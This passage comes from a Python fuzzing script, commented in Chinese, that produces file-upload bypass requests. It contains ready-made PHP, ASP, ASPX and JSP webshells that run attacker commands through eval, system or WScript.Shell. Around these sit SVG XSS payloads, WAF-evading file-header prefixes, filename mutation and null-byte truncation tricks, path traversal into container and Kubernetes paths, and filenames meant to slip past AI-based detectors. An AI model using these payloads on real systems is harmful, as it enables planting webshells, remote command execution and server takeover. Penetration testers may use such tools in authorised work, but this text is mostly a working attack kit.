Suffix = ['php'] # 只对PHP使用,因为大多数协议处理器是PHP特有的
# 最常用的几种协议
protocols = [
'phar://', 'zip://', 'php://', 'file://'
]
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX).group(1)
for protocol in protocols:
protocol_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total,
'filename="{}zc.{}"'.format(protocol, each_suffix)))
return protocol_payload
def svg_xss_Fuzz():
# SVG+XSS组合攻击
svg_xss_payload = []
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SVG = TEMP_TEMPLATE.replace(filename_suffix, 'svg')
if 'Content-Type:' in TEMP_TEMPLATE_SVG:
content_type_line = re.search(r'Content-Type:.*', TEMP_TEMPLATE_SVG).group(0)
# 基本SVG XSS载荷
svg_payloads = [
'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
'<svg xmlns="http://www.w3.org/2000/svg"><use href="data:image/svg+xml;base64,PHN2ZyBpZD0idGVzdCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+#test" /></svg>',
'<svg xmlns="http://www.w3.org/2000/svg"><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)"><rect width="100" height="100" /></a></svg>'
]
for payload in svg_payloads:
svg_xss_payload.append(TEMP_TEMPLATE_SVG.replace(content_type_line,
content_type_line + '\r\n' + payload))
return svg_xss_payload
def webdav_method_Fuzz():
# WebDAV方法滥用
webdav_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
# 添加WebDAV相关头部和方法
TEMP_TEMPLATE_WEBDAV = TEMP_TEMPLATE_SUFFIX
webdav_headers = 'Destination: file:///var/www/html/evil.{}\r\nOverwrite: T\r\n'.format(each_suffix)
if 'Content-Type:' in TEMP_TEMPLATE_WEBDAV:
webdav_payload.append(TEMP_TEMPLATE_WEBDAV.replace('Content-Type:',
webdav_headers + 'Content-Type:'))
return webdav_payload
def file_content_bypass_Fuzz():
# 文件内容检测绕过
content_bypass_payload = []
# 获取HTTP请求中的原始文件内容部分
original_content_match = re.search(r'Content-Type:.*?\r\n\r\n(.*?)(?:\r\n-{10,})', TEMPLATE, re.DOTALL)
original_content = ""
if original_content_match:
original_content = original_content_match.group(1)
# 找到包含原始内容的请求部分
content_part = original_content_match.group(0)
else:
# 如果找不到内容部分,就使用普通方式
content_part = None
# PHP WebShell内容变种
php_contents = [
'<?php eval($_POST["cmd"]); ?>',
'<?php system($_REQUEST["cmd"]); ?>',
'<?= `$_GET[0]`; ?>', # 短标签语法
'<?php $_GET[a](base64_decode($_GET[b])); ?>', # 动态函数调用
'<?php $a=chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);$a($_POST[x]); ?>', # 字符拼接绕过
'<?php include $_GET["file"]; ?>', # 文件包含
'<?php preg_replace("/.*/e",base64_decode($_POST["x"]),""); ?>', # preg_replace代码执行
'<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?php ${$_}[_]($_POST[x]);?>', # 无字母数字WebShell
'<script language="php">eval($_POST["cmd"]);</script>' # 使用script标签
]
# ASP WebShell内容变种
asp_contents = [
'<%eval request("cmd")%>', # 基本ASP WebShell
'<%execute request("cmd")%>', # 使用execute函数
'<%response.write CreateObject("WScript.Shell").exec(request("cmd")).StdOut.ReadAll()%>', # WScript.Shell
'<%execute(request("cmd"))%>', # 另一种写法
'<%eval(Replace(chr(112)+chr(97)+chr(115)+chr(115),chr(112)+chr(97)+chr(115)+chr(115),request("cmd")))%>' # 字符拼接
]
# ASPX WebShell内容变种
aspx_contents = [
'<%@ Page Language="C#" %><%System.Diagnostics.Process.Start("cmd.exe","/c "+Request["cmd"]);%>',
'<%@ Page Language="C#" %><%eval(Request.Item["cmd"]);%>',
'<%@ Page Language="C#" %><% System.IO.StreamWriter sw=new System.IO.StreamWriter(Request.Form["f"]);sw.Write(Request.Form["c"]);sw.Close(); %>',
'<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>'
]
# JSP WebShell内容变种
jsp_contents = [
'<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>',
'<%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>',
'<% out.println("Output: " + request.getParameter("cmd")); %>',
'<%! public void jspInit(){ try{ java.lang.Runtime.getRuntime().exec(request.getParameter("cmd")); }catch(Exception e){} } %>'
]
# WAF绕过混淆技术
waf_evasion_prefixes = [
'GIF89a;\n', # GIF文件头
'#!MIME type image/gif\n', # MIME类型注释
'<!--\n', # HTML注释
';base64,\n', # 伪装为Data URI
'BM\n', # BMP文件头
'%PDF-1.5\n', # PDF文件头
'ID3\n' # MP3文件头
]
# 针对不同文件类型应用不同内容
content_types = {
'php': php_contents,
'asp': asp_contents,
'aspx': aspx_contents,
'jsp': jsp_contents
}
for ext, contents in content_types.items():
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, ext)
# 针对每种内容变体
for content in contents[:2]: # 限制每种类型使用2个变体
if content_part and original_content:
# 替换原始内容而非附加 - 这是关键修改
new_content = content_part.replace(original_content, content)
content_bypass_payload.append(TEMP_TEMPLATE_SUFFIX.replace(content_part, new_content))
# 添加WAF绕过前缀 - 现在替换原始内容
for prefix in waf_evasion_prefixes[:3]:
new_content_with_prefix = content_part.replace(original_content, prefix + content)
content_bypass_payload.append(TEMP_TEMPLATE_SUFFIX.replace(content_part, new_content_with_prefix))
# 尝试添加注释和换行绕过 - 也是替换原始内容
if ext == 'php':
new_content_with_comment = content_part.replace(original_content, "/*\n*/\n" + content)
content_bypass_payload.append(TEMP_TEMPLATE_SUFFIX.replace(content_part, new_content_with_comment))
new_content_with_newline = content_part.replace(original_content, content.replace("<?php", "<?php\n"))
content_bypass_payload.append(TEMP_TEMPLATE_SUFFIX.replace(content_part, new_content_with_newline))
# 对于ASP和ASPX的注释绕过 - 替换原始内容
if ext in ['asp', 'aspx']:
new_content_with_comment = content_part.replace(original_content, "<!-- -->" + content)
content_bypass_payload.append(TEMP_TEMPLATE_SUFFIX.replace(content_part, new_content_with_comment))
else:
# 如果找不到原始内容,保持原来的附加方式作为备份
content_bypass_payload.append(TEMP_TEMPLATE_SUFFIX + "\r\n\r\n" + content)
return content_bypass_payload
def character_mutation_Fuzz():
# 字符变异绕过技术
char_mutation_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX).group(1)
# 1. 引号变换技术
# 单引号替代双引号
single_quote = TEMP_TEMPLATE_SUFFIX.replace('filename="', "filename='").replace('"', "'")
char_mutation_payload.append(single_quote)
# 无引号方式
no_quote = TEMP_TEMPLATE_SUFFIX.replace('filename="', "filename=").replace('"', "")
char_mutation_payload.append(no_quote)
# 反引号替代
back_quote = TEMP_TEMPLATE_SUFFIX.replace('filename="', "filename=`").replace('"', "`")
char_mutation_payload.append(back_quote)
# 2. 特殊字符混淆
# 多个分号
multi_semicolon = TEMP_TEMPLATE_SUFFIX.replace('form-data; ', 'form-data;;;; ')
char_mutation_payload.append(multi_semicolon)
# 多个等号
multi_equals = TEMP_TEMPLATE_SUFFIX.replace('filename=', 'filename======')
char_mutation_payload.append(multi_equals)
# 引号和分号组合 - 更简单的形式
quote_semicolon = TEMP_TEMPLATE_SUFFIX.replace('filename="', 'filename=";\";"')
char_mutation_payload.append(quote_semicolon)
# 3. Content-Disposition值畸形
# 变形的form-data
malformed_form = TEMP_TEMPLATE_SUFFIX.replace('form-data', 'f\ro\rm-\td\ata')
char_mutation_payload.append(malformed_form)
# form-data大小写混合
mixed_case = TEMP_TEMPLATE_SUFFIX.replace('form-data', 'FoRm-DaTa')
char_mutation_payload.append(mixed_case)
# 4. 换行符/特殊字符分隔
# filename参数中插入换行
newline_filename = TEMP_TEMPLATE_SUFFIX.replace('filename="', 'filename="\r\n')
char_mutation_payload.append(newline_filename)
# Content-Disposition中插入特殊字符
special_chars = ['\t', '\v', '\f', '\b']
for char in special_chars:
special_disp = TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition:', 'Content-Disposition:' + char)
char_mutation_payload.append(special_disp)
# 参数名与值之间插入特殊字符
special_param = TEMP_TEMPLATE_SUFFIX.replace('filename="', 'filename=' + char + '"')
char_mutation_payload.append(special_param)
# 5. 使用RFC不常见但有效的字符
# 使用反斜杠转义
backslash_escape = TEMP_TEMPLATE_SUFFIX.replace('filename="', 'filename="\\')
char_mutation_payload.append(backslash_escape)
# 参数和值之间加入空格变体
space_variants = [' ', ' ', ' \t ', ' \r ', ' \n ']
for space in space_variants:
space_param = TEMP_TEMPLATE_SUFFIX.replace('filename=', 'filename=' + space)
char_mutation_payload.append(space_param)
return char_mutation_payload
def data_overflow_Fuzz():
# 数据重复与溢出绕过技术
overflow_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX)
if not filename_total:
continue
filename_total = filename_total.group(1)
# 1. filename重复定义
if 'Content-Disposition:' in TEMP_TEMPLATE_SUFFIX:
# 多个filename参数
multi_filename_var = [
'filename="shell.jpg"; filename="shell.{}"'.format(each_suffix), # 双filename定义
'filename="shell.{}" filename="shell.jpg"'.format(each_suffix), # 无分号多filename
'filename="shell.jpg" filename="shell.txt" filename="shell.{}"'.format(each_suffix), # 三重filename
'filename="shell.jpg";filename="shell.{}"'.format(each_suffix), # 无空格双filename
'filename=""; filename="shell.{}"'.format(each_suffix) # 空filename后跟真实filename
]
for variation in multi_filename_var:
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, variation))
# 2. 数据溢出攻击
overflow_var = [
'filename="{}{}shell.{}"'.format('A'*128, '.', each_suffix), # 文件名前缀溢出
'filename="shell.{}{}."'.format(each_suffix, 'A'*128), # 文件名后缀溢出
'filename="shell.{}'.format(each_suffix) + '"' + 'A'*256, # 引号后垃圾数据
'filename="shell.' + 'A'*1024 + '.{}"'.format(each_suffix) # 超长文件名
]
for variation in overflow_var:
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, variation))
# 3. 边界溢出攻击
if '--' in TEMP_TEMPLATE_SUFFIX and 'Content-Type: ' in TEMP_TEMPLATE_SUFFIX:
# 提取boundary字符串
boundary_match = re.search(r'--[-A-Za-z0-9]*', TEMP_TEMPLATE_SUFFIX)
if boundary_match:
boundary = boundary_match.group(0)
# boundary重复与变体
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(boundary, boundary + '\r\n' + boundary))
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(boundary, boundary + boundary[2:]))
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(boundary, boundary + 'A'*256))
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(boundary, boundary + ';' + 'A'*128))
# 4. 高级截断技术
truncate_var = [
'filename="shell.{}\r\n.jpg"'.format(each_suffix), # 文件名中回车截断
'filename="shell.{}\0.jpg"'.format(each_suffix), # 空字节截断
'filename="shell.{}\t.jpg"'.format(each_suffix), # 制表符截断
'filename="shell.{}\\".jpg"'.format(each_suffix), # 反斜杠截断
'filename="shell.{}'.format(each_suffix) # 不闭合引号截断
]
for variation in truncate_var:
overflow_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, variation))
print "Data Overflow & Truncation generated %d payloads" % len(overflow_payload)
return overflow_payload
def advanced_character_mutation_Fuzz():
# 高级字符变异技术
mutation_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX)
if not filename_total:
continue
filename_total = filename_total.group(1)
# 1. 引号变换
# 使用不同的引号组合
quote_variations = [
'filename=shell.{}'.format(each_suffix), # 无引号
'filename=\'shell.{}\''.format(each_suffix), # 单引号
'filename="shell.{}'.format(each_suffix), # 前引号
'filename=shell.{}"'.format(each_suffix), # 后引号
'filename=\'shell.{}\"'.format(each_suffix), # 混合引号
'filename=""shell.{}"'.format(each_suffix), # 双引号嵌套
'filename=\'\'shell.{}\''.format(each_suffix) # 单引号嵌套
]
for variation in quote_variations:
mutation_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, variation))
# 2. 换行符插入
# 在字段名和值之间插入换行符
newline_variations = [
'filename=\nshell.{}'.format(each_suffix), # 等号后换行
'filename\n=shell.{}'.format(each_suffix), # 等号前换行
'filename=shell\n.{}'.format(each_suffix), # 文件名中换行
'filename=shell.\n{}'.format(each_suffix), # 点后换行
'filename\r\n=shell.{}'.format(each_suffix), # CRLF换行
'filename=\r\nshell.{}'.format(each_suffix) # 等号后CRLF
]
for variation in newline_variations:
mutation_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, variation))
# 3. 多符号累加
# 分号和等号的多重组合
symbol_variations = [
'filename==shell.{}'.format(each_suffix), # 双等号
'filename===shell.{}'.format(each_suffix), # 三等号
'filename====shell.{}'.format(each_suffix), # 四等号
'filename=;shell.{}'.format(each_suffix), # 等号后分号
'filename=;;;shell.{}'.format(each_suffix), # 等号后多分号
'filename="shell.{}";'.format(each_suffix), # 引号后分号
'filename="shell.{};;;;'.format(each_suffix) # 多分号结尾
]
for variation in symbol_variations:
mutation_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, variation))
# 4. Content-Disposition 值变种
if 'Content-Disposition: form-data;' in TEMP_TEMPLATE_SUFFIX:
cd_variations = [
'Content-Disposition: FoRm-DaTa;', # 大小写混合
'Content-Disposition: form-data ;', # 多空格
'Content-Disposition:form-data;', # 无空格
'Content-Disposition: form-data+;', # 加号
'Content-Disposition: form-data-;', # 减号
'Content-Disposition: form data;', # 无连字符
'Content-Disposition: form_data;', # 下划线
'Content-Disposition: formdata;', # 无分隔符
'Content-Disposition: form-d4ta;', # 数字替换
'Content-Disposition: xform-data;' # 前缀干扰
]
for variation in cd_variations:
mutation_payload.append(TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition: form-data;', variation))
print "Advanced Character Mutation generated %d payloads" % len(mutation_payload)
return mutation_payload
def cloud_environment_bypass_Fuzz():
# 云环境特定绕过技术
cloud_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX)
if not filename_total:
continue
filename_total = filename_total.group(1)
# 1. 对象存储元数据攻击
# AWS S3/Azure Blob存储相关绕过
s3_metadata_headers = [
'x-amz-meta-filetype: text/html\r\n',
'x-amz-meta-original-filename: original.{}\r\n'.format(each_suffix),
'x-amz-website-redirect-location: /evil.{}\r\n'.format(each_suffix),
'x-ms-meta-resourcetype: Microsoft.Compute/virtualMachines/extensions\r\n',
'x-ms-blob-content-type: text/html\r\n'
]
for header in s3_metadata_headers:
if 'Content-Type:' in TEMP_TEMPLATE_SUFFIX:
cloud_payload.append(TEMP_TEMPLATE_SUFFIX.replace('Content-Type:', header + 'Content-Type:'))
# 2. 容器化环境路径遍历
container_paths = [
'filename="/proc/self/root/var/www/html/shell.{}"'.format(each_suffix),
'filename="/proc/self/cwd/shell.{}"'.format(each_suffix),
'filename="/proc/self/environ/shell.{}"'.format(each_suffix),
'filename="../../../etc/passwd/shell.{}"'.format(each_suffix),
'filename="../../../../var/www/html/shell.{}"'.format(each_suffix)
]
for path in container_paths:
cloud_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, path))
# 3. Kubernetes/Docker环境特殊路径
k8s_paths = [
'filename="/var/run/secrets/kubernetes.io/shell.{}"'.format(each_suffix),
'filename="/var/run/docker.sock/shell.{}"'.format(each_suffix),
'filename=".dockerenv/shell.{}"'.format(each_suffix),
'filename="/tmp/shell.{}"'.format(each_suffix),
'filename="/dev/shm/shell.{}"'.format(each_suffix)
]
for path in k8s_paths:
cloud_payload.append(TEMP_TEMPLATE_SUFFIX.replace(filename_total, path))
# 4. 云函数临时存储利用
if 'Content-Disposition:' in TEMP_TEMPLATE_SUFFIX:
cloud_payload.append(TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition:',
'X-Function-Storage: /tmp\r\nContent-Disposition:'))
cloud_payload.append(TEMP_TEMPLATE_SUFFIX.replace('Content-Disposition:',
'X-Lambda-Tmp-Dir: /tmp\r\nContent-Disposition:'))
print "Cloud Environment Bypass generated %d payloads" % len(cloud_payload)
return cloud_payload
def advanced_defense_evasion_Fuzz():
# 高级防御绕过技术 - 针对AI和行为分析防御系统
defense_payload = []
Suffix = ['php', 'asp', 'aspx', 'jsp']
for each_suffix in Suffix:
TEMP_TEMPLATE = TEMPLATE
TEMP_TEMPLATE_SUFFIX = TEMP_TEMPLATE.replace(filename_suffix, each_suffix)
filename_total = re.search('(filename=".*")', TEMP_TEMPLATE_SUFFIX)
if not filename_total:
continue
filename_total = filename_total.group(1)
# 1. AI模型绕过 - 混淆和逃逸技术
ai_evasion_filenames = [
# 语义扰动技术 (针对基于语义的模型)
'filename="innocent_image.{}.jpg"'.format(each_suffix),
'filename="profile_picture.{}"'.format(each_suffix),
'filename="harmless_doc.{}.txt"'.format(each_suffix),
'filename="backup.{}.dat"'.format(each_suffix),
'filename="normal_file.{}bin"'.format(each_suffix),
'filename="document_{}_v1.0.txt"'.format(each_suffix),